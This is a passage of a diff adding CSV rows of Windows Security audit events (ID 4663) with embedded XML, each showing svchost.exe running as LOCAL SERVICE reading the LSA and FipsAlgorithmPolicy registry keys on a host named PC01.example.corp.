+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:14.764613Z"">
+    </TimeCreated>
+    <EventRecordID>452815</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:14.634426Z"">
+    </TimeCreated>
+    <EventRecordID>452814</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:14.634426+04:00,1553038514.634426,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:14.634426Z"">
+    </TimeCreated>
+    <EventRecordID>452813</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.365477Z"">
+    </TimeCreated>
+    <EventRecordID>452922</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.365477Z"">
+    </TimeCreated>
+    <EventRecordID>452921</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.365477Z"">
+    </TimeCreated>
+    <EventRecordID>452920</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.365477Z"">
+    </TimeCreated>
+    <EventRecordID>452919</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452918</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452917</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452916</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452915</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452914</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452913</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452912</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452911</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452910</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
